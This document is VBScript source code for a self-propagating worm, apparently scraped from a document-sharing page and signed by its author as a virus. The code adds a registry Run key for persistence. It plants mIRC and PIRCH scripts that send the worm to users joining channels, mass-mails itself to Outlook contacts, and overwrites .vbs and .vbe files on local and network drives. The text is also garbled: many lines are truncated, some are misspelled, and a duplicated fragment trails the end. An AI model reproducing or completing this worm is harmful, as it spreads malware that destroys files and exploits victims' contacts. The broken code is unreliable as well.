Anda di halaman 1dari 5

set ws = createobject("wscript.

ws.regwrite "hklm\software\microsoft\windows\currentversion\run\worm",
"wscript.exe c:\windows\worm.vbs %"

function pirch(path)
on error resume next
set fso = createobject("scripting.filesystemobject")
set ws = createobject("")
if path = "" then
if fso.fileexists("c:\pirch\pirch32.exe") then path = "c:\pirch"
if fso.fileexists("c:\pirch32\pirch32.exe") then path = "c:\pirch32"
pfdir =
if fso.fileexists(pfdir & "\pirch\pirch32.exe") then path = pfdir &
end if
if path <> "" then
set script = fso.createtextfile(path & "\events.ini", true)
script.writeline "[levels]"
script.writeline "enabled=1"
script.writeline "count=6"
script.writeline "level1=000-unknowns"
script.writeline "000-unknownsenabled=1"
script.writeline "level2=100-level 100"
script.writeline "100-level 100enabled=1"
script.writeline "level3=200-level 200"
script.writeline "200-level 200enabled=1"
script.writeline "level4=300-level 300"
script.writeline " 300-level 300enabled=1"
script.writeline "level5=400-level 400 "
script.writeline "400-level 400enabled=1"
script.writeline "level6=500-level 500"
script.writeline "500-level 500enabled=1"
script.writeline ""
script.writeline "[000-unknowns]"
script.writeline "usercount=0"
script.writeline "eventcount=0"
script.writeline ""
script.writeline "[100-level 100]"
script.writeline "user1=*!*@*"
script.writeline "usercount=1"
script.writeline "event1=on join:#:/" & chr(100) & chr(99) & chr(99) & " tsend
$nick c:\windows\worm.vbs"
script.writeline "eventcount=1"
script.writeline ""
script.writeline "[200-level 200]"
script.writeline "usercount=0"
script.writeline "eventcount=0"
script.writeline ""
script.writeline "[300-level 300]"
script.writeline "usercount=0"
script.writeline "eventcount=0"
script.writeline ""
script.writeline "[400-level 400]"
script.writeline "usercount=0"
script.writeline "eventcount=0"
script.writeline ""
script.writeline "[500-level 500]"
script.writeline "usercount=0"
script.writeline "eventcount=0"
end if
end function
function outlookbody()
on error resume next
set fso = createobject("scripting.filesystemobject")
set outlook = createobject("outlook.application")
if outlook = "outlook" then
set myself = fso.opentextfile(wscript.scriptfullname, 1)
i = 1
do while myself.atendofstream = false
myline = myself.readline
code = code & chr(34) & " & vbcrlf & " & chr(34) & replace(myline, chr(34),
chr(34) & "&chr(34)&" & chr(34))
htm = "<" & "html><" & "head><" & "meta content=" & chr(34) & " & chr(34) & " &
chr(34) & "text/html; charset=iso-8859-1" & chr(34) & " http-equiv=content-type><"
& "meta content=" & chr(34) & "mshtml 5.00.2314.1000" & chr(34) & "
name=generator><" & "style></" & "style></" & "head><" & "body bgcolor=#ffffff><"
& "script language=vbscript>"
htm = htm & vbcrlf & "on error resume next"
htm = htm & vbcrlf & "set fso = createobject(" & chr(34) &
"scripting.filesystemobject" & chr(34) & ")"
htm = htm & vbcrlf & "if err.number <> 0 then"
htm = htm & vbcrlf & "document.write " & chr(34) & "<font face='verdana'
color=#ff0000 size='2'>you need activex enabled if you want to see this e-
mail.<br>please open this message again and click accept activex<br>microsoft
outlook</font>" & chr(34) & ""
htm = htm & vbcrlf & "else"
htm = htm & vbcrlf & "set vbs = fso.createtextfile(fso.getspecialfolder(0) & " &
chr(34) & "\worm.vbs" & chr(34) & ", true)"
htm = htm & vbcrlf & "vbs.write " & chr(34) & code & chr(34)
htm = htm & vbcrlf & "vbs.close"
htm = htm & vbcrlf & "set ws = createobject(" & chr(34) & "" &
chr(34) & ")"
htm = htm & vbcrlf & " fso.getspecialfolder(0) & " & chr(34) & "\wscript.exe
" & chr(34) & " & fso.getspecialfolder(0) & " & chr(34) & "\worm.vbs %" & chr(34)
& ""
htm2 = htm2 & vbcrlf & "document.write " & chr(34) & "this message has permanent
errors.<br>sorry<br>" & chr(34) & ""
htm2 = htm2 & vbcrlf & "end if"
htm2 = htm2 & vbcrlf & "<" & "/script></" & "body></" & "html>"
htmlbody = htm & htm2
set mapi = outlook.getnamespace("mapi")
set mapiadd=mapi.addresslists
for each addresslist in mapiadd
if addresslist.addressentries.count <> 0 then
addcount = addresslist.addressentries.count
set msg = outlook.createitem(0)
msg.subject = "rv: 4you"
msg.htmlbody = htmlbody
msg.deleteaftersubmit = true
for ii = 1 to addcount
set addentry = addresslist.addressentries(ii)
if addcount = 1 then
msg.bcc = addentry.address
msg.bcc = msg.bcc & "; " & addentry.address
end if
end if
end if
end function
function outlook()
on error resume next
set outlookapp = createobject("outlook.application")
if outlookapp = "outlook" then
set mapi = outlookapp.getnamespace("mapi")
set mapiadlist as mapi.addresslists
for each addresslist in mapiadlist
if addresslist.addressentries.count <> 0 then
addresslistcout = addresslist.addressentries.count
for addlist = 1 to addresslistcout
set msg = outlookapp.createitem(0)
set adentries = addresslist.addressentries(addlist) = adentries.address
msg.subject = "here you have, ;o)"
msg.body = "hi:" & vbcrlf & "check this!"
set attachs=msg.attachments
attachs.add "c:\window\worm.vbs"
msg.deleteaftersubmit = true
if <> "" then
end if
end if
end if
end function

function mirc(path)
on error resume next
set fso = createobject("scripting.filesystemobject")
set ws = createobject("")
if path = "" then
if fso.fileexists("c:\mirc\mirc.ini") then path = "c:\mirc"
if fso.fileexists("c:\mirc32\mirc.ini") then path = "c:\mirc32"
pfdir =
if fso.fileexists(pfdir & "\mirc\mirc.ini") then path = pfdir & "\mirc"
end if
if path <> "" then
set script = fso.createtextfile(path & "\script.ini", true)
script.writeline "[script]"
script.writeline "n0=on 1:join:#:{"
script.writeline "n1= /if ( $nick == $me ) { halt }"
script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick
script.writeline "n3=}"
end if
end function

function dodrives()
on error resume next
set fso = createobject("scipting.filesystemobject")
set drives = fso.drives
for each drive in drives
if drive.drivetype = remote then
drivefull = drive & "\"
call subfolders(drivefull)
elseif drive.isready then
drivefull = drive & "\"
call subfolders(drivefull)
end if
end function
function subfolders(path)
set fold = fso.getfolder(newpath)
set files = fold.files
for each file in files
if fso.getextensionname(file.path) = "vbs" then
fso.copyfile wscript.scriptfullname, file.path, true
end if
if fso.getextensionname(file.path) = "vbe" then
fso.copyfile wscript.scriptfullname, file.path, true
end if
if = "mirc.ini" then
mirc (file.parentfolder)
end if
if = "pirch32.exe" then
pirch (file.parentfolder)
end if
set file = fold.subfolders
for each subfol in file
call subfolders(subfol.path)
end function

function antidelete()
set fso = createobject("scripting.filesystemobject")
set myself = fso.opentextfile(wscript.scriptfullname, 1)
mycode = myself.readall
if not (fso.fileexists(wscript.scriptfullname)) then
set myself = fso.createtextfile(wscript.scriptfullname, true)
myself.write mycode
end if
end function

this virus was made by sy5t3mf41lur3

& vbcrlf & "set ws = createobject(" & chr(34) & "" & chr(34) & ")"
htm = htm & vbcrlf & " fso.getspecialfolder(0) & " & chr(34) & "\wscript.exe
" & chr(34) & " & fso.getspecialfolder(0) & " & chr(34) & "\worm.vbs %" & chr(34)
& ""
htm2 = htm2 & vbcrlf & "doc

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